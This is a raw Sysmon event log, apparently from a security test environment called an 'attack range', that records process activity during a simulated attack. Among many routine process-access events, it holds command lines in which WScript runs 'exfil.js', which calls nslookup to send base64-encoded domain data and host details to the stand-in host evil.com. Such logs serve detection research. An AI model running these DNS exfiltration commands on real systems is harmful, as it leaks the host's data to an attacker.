10341000x8000000000000000209607Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.659{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209606Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.659{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-EC43-000000005F02}4200C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209605Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.659{2E1864BB-18ED-629A-EA43-000000005F02}79604768C:\Windows\system32\cmd.exe{2E1864BB-18ED-629A-EC43-000000005F02}4200C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209604Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.670{2E1864BB-18ED-629A-EC43-000000005F02}4200C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Model: t3.2xlarge evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18ED-629A-EA43-000000005F02}7960C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Model: t3.2xlarge evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlebavnl.tmp 2>&1 10341000x8000000000000000209603Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.644{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18ED-629A-EB43-000000005F02}6424C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209602Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.644{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18ED-629A-EB43-000000005F02}6424C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209601Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.628{2E1864BB-18ED-629A-EB43-000000005F02}64244708C:\Windows\system32\conhost.exe{2E1864BB-18ED-629A-EA43-000000005F02}7960C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209600Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.628{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-EB43-000000005F02}6424C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209599Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.628{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209598Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.628{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209597Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.628{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209596Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.628{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209595Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.612{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-EA43-000000005F02}7960C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209594Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.612{2E1864BB-18E0-629A-6742-000000005F02}39761104C:\Windows\System32\WScript.exe{2E1864BB-18ED-629A-EA43-000000005F02}7960C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209593Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.627{2E1864BB-18ED-629A-EA43-000000005F02}7960C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Model: t3.2xlarge evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlebavnl.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000209592Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.612{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nllklhap.tmpMD5=7564BBC357DA8472A939C2EE79A792F5,SHA256=2DBE8B361679ED57394E9EFB1DF40D5559A7E60F6F1F0A6E2904E60B52067C41,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209591Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.597{2E1864BB-18ED-629A-E843-000000005F02}52164296C:\Windows\system32\conhost.exe{2E1864BB-18ED-629A-E943-000000005F02}4128C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209590Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.597{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209589Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.597{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209588Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.597{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-E943-000000005F02}4128C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209587Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.597{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209586Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.597{2E1864BB-18ED-629A-E743-000000005F02}59767732C:\Windows\system32\cmd.exe{2E1864BB-18ED-629A-E943-000000005F02}4128C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209585Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.597{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209584Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.597{2E1864BB-18ED-629A-E943-000000005F02}4128C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18ED-629A-E743-000000005F02}5976C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllklhap.tmp 2>&1 10341000x8000000000000000209583Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.575{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18ED-629A-E843-000000005F02}5216C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209582Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.575{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18ED-629A-E843-000000005F02}5216C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209581Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.559{2E1864BB-18ED-629A-E843-000000005F02}52164296C:\Windows\system32\conhost.exe{2E1864BB-18ED-629A-E743-000000005F02}5976C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209580Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.543{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-E843-000000005F02}5216C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209579Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.543{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209578Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.543{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-E743-000000005F02}5976C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209577Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.543{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209576Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.543{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209575Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 